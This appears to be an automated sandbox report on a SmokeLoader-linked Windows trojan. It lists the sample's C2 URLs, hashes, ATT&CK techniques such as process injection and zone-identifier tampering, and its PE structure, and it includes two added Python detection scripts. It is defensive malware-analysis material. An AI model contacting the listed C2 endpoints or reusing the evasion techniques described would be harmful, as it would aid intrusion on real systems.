Source: Yara match, File source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix (a number in front of a technique is the count shown in that matrix cell)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 33 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 12 Virtualization/Sandbox Evasion | LSASS Memory | 421 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 33 Process Injection | Security Account Manager | 12 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 112 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 115 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph

Behavior Graph ID: 1538071
Sample: 2Qvkmk7HGr.exe
Start date: 20/10/2024
Architecture: WINDOWS
Score: 100

Start node:
• DNS/IP: volisc.biz; tnc-corp.ru; 2 other IPs or domains
• Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 7 other signatures
• Started processes: 2Qvkmk7HGr.exe; tcgiwaf; tcgiwaf

2Qvkmk7HGr.exe:
• Signatures: Detected unpacking (changes PE section rights); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 3 other signatures
• Injected into: explorer.exe (59 created registry values, 3 created files)

tcgiwaf (both instances):
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

explorer.exe (injected):
• DNS/IP: tnc-corp.ru (211.171.233.126), ports 54853, 54854, 55686, LGDACOM Corporation (KR), Korea Republic of
• Dropped files: C:\Users\user\AppData\Roaming\tcgiwaf (PE32); C:\Users\user\...\tcgiwaf:Zone.Identifier (ASCII)
• Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

Source | Detection | Scanner | Label
2Qvkmk7HGr.exe | 39% | ReversingLabs |
2Qvkmk7HGr.exe | 41% | Virustotal |
2Qvkmk7HGr.exe | 100% | Avira | HEUR/AGEN.1306978
2Qvkmk7HGr.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\tcgiwaf | 100% | Avira | HEUR/AGEN.1306978
C:\Users\user\AppData\Roaming\tcgiwaf | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\tcgiwaf | 39% | ReversingLabs |
      No Antivirus matches
Source | Detection | Scanner
tnc-corp.ru | 2% | Virustotal
liverds.at | 5% | Virustotal
livbev.online | 6% | Virustotal
volisc.biz | 6% | Virustotal
Source | Detection | Scanner
http://volisc.biz/tmp/index.php | 0% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tnc-corp.ru | 211.171.233.126 | true | true | | unknown
volisc.biz | unknown | unknown | true | | unknown
liverds.at | unknown | unknown | true | | unknown
livbev.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://volisc.biz/tmp/index.php | true | | unknown
http://livbev.online/tmp/index.php | true | | unknown
http://liverds.at/tmp/index.php | true | | unknown
http://tnc-corp.ru/tmp/index.php | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
211.171.233.126 | tnc-corp.ru | Korea Republic of | 3786 | LGDACOM Corporation (KR) | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1538071
                                            Start date and time:2024-10-20 09:36:05 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 48s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:2Qvkmk7HGr.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:4bb69f9fad0620ecb64971676b9f2cbc.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@3/2@72/1
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 28
                                            • Number of non-executed functions: 28
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.64, 20.190.159.68, 20.190.159.4, 20.190.159.75, 20.190.159.71, 20.190.159.2, 40.126.31.67
                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target tcgiwaf, PID 5848 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:37:24 | API Interceptor | 392073x Sleep call for process: explorer.exe modified
08:37:23 | Task Scheduler | Run new task: Firefox Default Browser Agent B5D95B271C8A718D path: C:\Users\user\AppData\Roaming\tcgiwaf
Match: 211.171.233.126
Associated Sample Name / URL | Detection | Threat Name | Context
z2vfX2REnQ.exe | malicious | SmokeLoader | tnc-corp.ru/tmp/index.php
wxy6cQKIqG.exe | malicious | SmokeLoader | tnc-corp.ru/tmp/index.php
file.exe | malicious | SmokeLoader | nwgrus.ru/tmp/index.php
file.exe | malicious | SmokeLoader | nwgrus.ru/tmp/index.php
LavMqtzZNw.exe | malicious | LummaC, SmokeLoader | movlat.com/tmp/
uBgwoHPWaf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | dbfhns.in/tmp/index.php
Jrkfds7rI5.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer | sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
SecuriteInfo.com.Win32.RansomX-gen.4067.126.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader | kamsmad.com/tmp/index.php
7leZRNBofA.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc | trmpc.com/check/index.php
SKHOtnHl7J.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc | kamsmad.com/tmp/index.php

Match: tnc-corp.ru
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | SmokeLoader | 187.204.28.205
Ypp1MuoIa1.exe | malicious | SmokeLoader | 190.220.21.28
5iwz8543Xc.exe | malicious | SmokeLoader | 190.146.112.188
file.exe | malicious | SmokeLoader | 185.12.79.25
z2vfX2REnQ.exe | malicious | SmokeLoader | 186.193.139.53
d8jsKv1X4Q.exe | malicious | SmokeLoader | 177.222.41.236
PSyWSlhDa5.exe | malicious | SmokeLoader | 58.151.148.90
wxy6cQKIqG.exe | malicious | SmokeLoader | 211.171.233.126
H3CVATCJSD.exe | malicious | SmokeLoader | 211.181.24.132
Y0KE01P97o.exe | malicious | SmokeLoader | 187.199.203.72

Match: LGDACOM Corporation (KR)
Associated Sample Name / URL | Detection | Threat Name | Context
yakuza.m68k.elf | malicious | Unknown | 118.129.9.235
la.bot.mips.elf | malicious | Unknown | 123.140.76.146
sparc.elf | malicious | Unknown | 115.92.2.125
la.bot.sparc.elf | malicious | Unknown | 211.168.94.59
la.bot.mips.elf | malicious | Unknown | 58.75.113.132
mipsel.elf | malicious | Unknown | 112.217.33.43
la.bot.m68k.elf | malicious | Unknown | 1.220.134.192
la.bot.powerpc.elf | malicious | Unknown | 58.78.205.83
arm7.elf | malicious | Unknown | 106.244.84.80
file.exe | malicious | SmokeLoader | 211.181.24.132
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):376832
                                            Entropy (8bit):6.531759115195053
                                            Encrypted:false
                                            SSDEEP:6144:gQLgu6NlN0niBcbNynh3oDisWPHVz0Ws1gbBqkNj8f:gQ5690icodkifKWs2BqkN
                                            MD5:4BB69F9FAD0620ECB64971676B9F2CBC
                                            SHA1:519D65503D586D0442EA411D03E790D52B564EEE
                                            SHA-256:6CE6A03625C3A1E2B97D490363A3EC5BE1706EC424493D7DE2C9CAD2644C3311
                                            SHA-512:7168F65A3362C41B5FE7E4BDA908A0372B1061CF100B841715C854FCDA4635C0E722D37309DE71D7E16B9D94302B9A21F36353A0C1B9F02FD68FE3FE1C3BEDEA
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 39%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s.(!J./s.G!J./s..!J...1.4!J.1!K..!J./s..0!J./s.0!J./s.0!J.Rich1!J.........................PE..L.....td.............................O............@................................. .......................................X...<............................p......................................@/..@............................................text...\........................... ..`.data............`..................@....rsrc...............................@..@.reloc..2....p......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
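The second dropped artefact is the Zone.Identifier alternate data stream of the dropped copy, and it reads ZoneId=0 (URLZONE_LOCAL_MACHINE) with no HostUrl or ReferrerUrl, written by explorer.exe. A file saved by a browser carries ZoneId=3 plus the source URLs, so what is recorded here is the Mark-of-the-Web being rewritten on the copy rather than inherited from the download; the "very likely benign" reputation applies to the stream bytes, not to what they imply. The parser below is an added example, not Joe Sandbox code: it reads the INI text with configparser, maps the zone number to its name, and returns a finding when a low zone with no host URL is written on a freshly dropped PE by a process that has no business downgrading zones. The browser stream it compares against is constructed, with a placeholder example.invalid host, and the CR/LF placement inside the 26-byte dropped stream is assumed.

```python
import configparser

# URLZONE values as written to a :Zone.Identifier stream (urlmon.h).
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


def parse_zone_identifier(raw: bytes) -> dict:
    """Parse the INI-style text of a file's :Zone.Identifier alternate data stream."""
    # Only '=' is a delimiter, so URL values containing ':' are not split.
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(raw.decode("utf-8", errors="replace"))
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("no [ZoneTransfer] section")
    zt = cp["ZoneTransfer"]
    zone_id = zt.getint("ZoneId", fallback=None)
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id) if zone_id is not None else None,
        "host_url": zt.get("HostUrl", fallback=None),
        "referrer_url": zt.get("ReferrerUrl", fallback=None),
    }


def motw_finding(raw: bytes, written_by: str) -> tuple:
    """Return (suspicious, reason) for a Zone.Identifier stream on a freshly dropped PE.

    A zone below Internet (3) with no HostUrl means the mark was written, not
    inherited from a download: nothing records where the file came from."""
    info = parse_zone_identifier(raw)
    if info["zone_id"] is None:
        return True, f"ZoneId missing; stream rewritten by {written_by}"
    if info["zone_id"] < 3 and not info["host_url"]:
        return True, (f"ZoneId={info['zone_id']} ({info['zone']}) with no HostUrl, "
                      f"written by {written_by}: Mark-of-the-Web downgraded")
    return False, f"ZoneId={info['zone_id']} ({info['zone']}), HostUrl={info['host_url']}"


# Stream content as listed in the report (26 bytes; line-ending placement assumed).
DROPPED_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"

# Constructed comparison: what a browser download normally writes (placeholder host).
BROWSER_STREAM = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                  b"ReferrerUrl=https://example.invalid/\r\n"
                  b"HostUrl=https://example.invalid/setup.exe\r\n")

if __name__ == "__main__":
    print(motw_finding(DROPPED_STREAM, "explorer.exe"))
    print(motw_finding(BROWSER_STREAM, "chrome.exe"))
```

On the dropped stream this returns a suspicious finding; on the constructed browser stream it does not. The same check applied across a sandbox's dropped-file list, keyed on the writing process, separates files that lost their mark from files that never had one.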
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.531759115195053
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:2Qvkmk7HGr.exe
                                            File size:376'832 bytes
                                            MD5:4bb69f9fad0620ecb64971676b9f2cbc
                                            SHA1:519d65503d586d0442ea411d03e790d52b564eee
                                            SHA256:6ce6a03625c3a1e2b97d490363a3ec5be1706ec424493d7de2c9cad2644c3311
                                            SHA512:7168f65a3362c41b5fe7e4bda908a0372b1061cf100b841715c854fcda4635c0e722d37309de71d7e16b9d94302b9a21f36353a0c1b9f02fd68fe3fe1c3bedea
                                            SSDEEP:6144:gQLgu6NlN0niBcbNynh3oDisWPHVz0Ws1gbBqkNj8f:gQ5690icodkifKWs2BqkN
                                            TLSH:B084F12239D0C072D5A756304835D7A42A3FBD325A61C55F37583B6F2E332D2AA3636B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s..(!J./s..G!J./s...!J...1.4!J.1!K..!J./s..0!J./s..0!J./s..0!J.Rich1!J.........................PE..L.....td...
                                            Icon Hash:60406e76566e5c46
                                            Entrypoint:0x404fc1
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x647409B6 [Mon May 29 02:11:02 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:734589f5246b662a5747f60ad9c50ca5
                                            Instruction
                                            call 00007F16BD119F23h
                                            jmp 00007F16BD1152FEh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 004012ACh
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007F16BD11548Eh
                                            test byte ptr [eax], 00000008h
                                            je 00007F16BD115489h
                                            mov dword ptr [ebp-0Ch], 01994000h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            push dword ptr [ebp-10h]
                                            push dword ptr [ebp-1Ch]
                                            push dword ptr [ebp-20h]
                                            call dword ptr [004010DCh]
                                            leave
                                            retn 0008h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push ecx
                                            push ebx
                                            mov eax, dword ptr [ebp+0Ch]
                                            add eax, 0Ch
                                            mov dword ptr [ebp-04h], eax
                                            mov ebx, dword ptr fs:[00000000h]
                                            mov eax, dword ptr [ebx]
                                            mov dword ptr fs:[00000000h], eax
                                            mov eax, dword ptr [ebp+08h]
                                            mov ebx, dword ptr [ebp+0Ch]
                                            mov ebp, dword ptr [ebp-04h]
                                            mov esp, dword ptr [ebx-04h]
                                            jmp eax
                                            pop ebx
                                            leave
                                            retn 0008h
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push ecx
                                            push ecx
                                            push ebx
                                            push esi
                                            push edi
                                            mov esi, dword ptr fs:[00000000h]
                                            mov dword ptr [ebp-04h], esi
                                            mov dword ptr [ebp-08h], 00405089h
                                            push 00000000h
                                            push dword ptr [ebp+0Ch]
                                            push dword ptr [ebp-08h]
                                            push dword ptr [ebp+08h]
                                            call 00007F16BD12289Ah
                                            Programming Language:
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [C++] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4a358 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x9ee0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x67000 | 0xd04 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2f40 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1b8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x49d5c | 0x49e00 | eadfd2c747f20fe6ac4a71fc9841e0ba | False | 0.7261394881556683 | data | 7.0024890042663355 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x4b000 | 0x1199c | 0x6000 | 7533c829322fe243afafb774a12f4603 | False | 0.08304850260416667 | data | 0.9871638251375947 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5d000 | 0x9ee0 | 0xa000 | 84539bd8d34906b7b6a50500487bfccf | False | 0.455322265625 | data | 5.178429957892636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x67000 | 0x1c32 | 0x1e00 | 5c8c35ed1ab5a0d1207fbd5baa0f41b3 | False | 0.3671875 | data | 3.739122301762688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
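Two things in the section table above matter before any unpacking starts. The executable .text section has an entropy of 7.00 and a ZLIB complexity of 0.73, so most of it is compressed or encrypted data rather than code, and .data declares a virtual size (0x1199c) almost three times its raw size (0x6000), leaving zero-filled room for the unpacked payload to be written into at runtime. The script below is an added example, not Joe Sandbox code: it decodes IMAGE_SECTION_HEADER records with struct, rebuilds this sample's table from the values in the report (the PointerToRawData values are assumed, 0x200-aligned, because the report does not list them, and the per-section entropies are taken from the report rather than recomputed), and applies the static checks an analyst runs first: writable-and-executable sections, high-entropy executable sections, virtual size far above raw size, and an entry point that falls outside an executable section.

```python
import struct

# IMAGE_SECTION_HEADER (winnt.h): 8-byte name, six DWORDs, two WORDs, Characteristics = 40 bytes.
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_section_headers(table: bytes, count: int) -> list:
    """Decode `count` consecutive section headers from a raw section table."""
    sections = []
    for i in range(count):
        name, vsize, va, rawsize, rawptr, _rel, _lin, _nrel, _nlin, chars = \
            SECTION_HDR.unpack_from(table, i * SECTION_HDR.size)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vsize": vsize, "va": va, "rawsize": rawsize,
            "rawptr": rawptr, "chars": chars,
        })
    return sections


def section_for_rva(sections: list, rva: int):
    """The section whose in-memory range contains `rva`, or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def section_findings(sections: list, entropy: dict, entry_rva: int) -> list:
    """Static packing / tampering indicators as (section name, code) pairs."""
    findings = []
    for s in sections:
        executable = bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(s["chars"] & IMAGE_SCN_MEM_WRITE)
        if executable and writable:
            findings.append((s["name"], "WX"))                  # unpack-in-place / self-modifying
        if executable and entropy.get(s["name"], 0.0) > 6.8:
            findings.append((s["name"], "HIGH_ENTROPY_CODE"))   # code section is mostly packed data
        if s["rawsize"] and s["vsize"] > 1.5 * s["rawsize"]:
            findings.append((s["name"], "VSIZE_GT_RAW"))        # slack for runtime-written data
    ep = section_for_rva(sections, entry_rva)
    if ep is None or not ep["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append((ep["name"] if ep else "<none>", "EP_NOT_IN_EXEC_SECTION"))
    return findings


def build_header(name: str, vsize: int, va: int, rawsize: int, rawptr: int, chars: int) -> bytes:
    """Pack one section header (relocation/line-number fields zero)."""
    return SECTION_HDR.pack(name.encode().ljust(8, b"\0"), vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)


# This sample's section table from the report. PointerToRawData values are assumed
# (file-aligned to 0x200, headers in the first 0x400 bytes); the report does not list them.
SAMPLE_SECTION_TABLE = b"".join([
    build_header(".text", 0x49d5c, 0x1000, 0x49e00, 0x400,
                 IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    build_header(".data", 0x1199c, 0x4b000, 0x6000, 0x4a200,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    build_header(".rsrc", 0x9ee0, 0x5d000, 0xa000, 0x50200,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    build_header(".reloc", 0x1c32, 0x67000, 0x1e00, 0x5a200,
                 IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
])
# Per-section entropies as reported by the sandbox (not recomputed here).
SAMPLE_ENTROPY = {".text": 7.0024890042663355, ".data": 0.9871638251375947,
                  ".rsrc": 5.178429957892636, ".reloc": 3.739122301762688}
ENTRY_RVA = 0x404fc1 - 0x400000   # Entrypoint minus Imagebase from the report


def analyse_sample() -> tuple:
    sections = parse_section_headers(SAMPLE_SECTION_TABLE, 4)
    return sections, section_findings(sections, SAMPLE_ENTROPY, ENTRY_RVA)


if __name__ == "__main__":
    for name, code in analyse_sample()[1]:
        print(f"{name:8} {code}")
```

For this sample the checks report HIGH_ENTROPY_CODE on .text and VSIZE_GT_RAW on .data; there is no W^X section on disk, which is consistent with the loader changing section protections only at runtime, and the entry point (RVA 0x4fc1) sits inside .text as expected for an MSVC CRT start-up.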
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x63d70 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x640a0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_CURSOR | 0x641f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
RT_CURSOR | 0x650a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
RT_CURSOR | 0x65948 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
RT_ICON | 0x5d4f0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.392590618336887
RT_ICON | 0x5d4f0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.392590618336887
RT_ICON | 0x5e398 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5496389891696751
RT_ICON | 0x5e398 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5496389891696751
RT_ICON | 0x5ec40 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.6215437788018433
RT_ICON | 0x5ec40 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.6215437788018433
RT_ICON | 0x5f308 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6596820809248555
RT_ICON | 0x5f308 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6596820809248555
RT_ICON | 0x5f870 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.49761410788381744
RT_ICON | 0x5f870 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.49761410788381744
RT_ICON | 0x61e18 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.5173545966228893
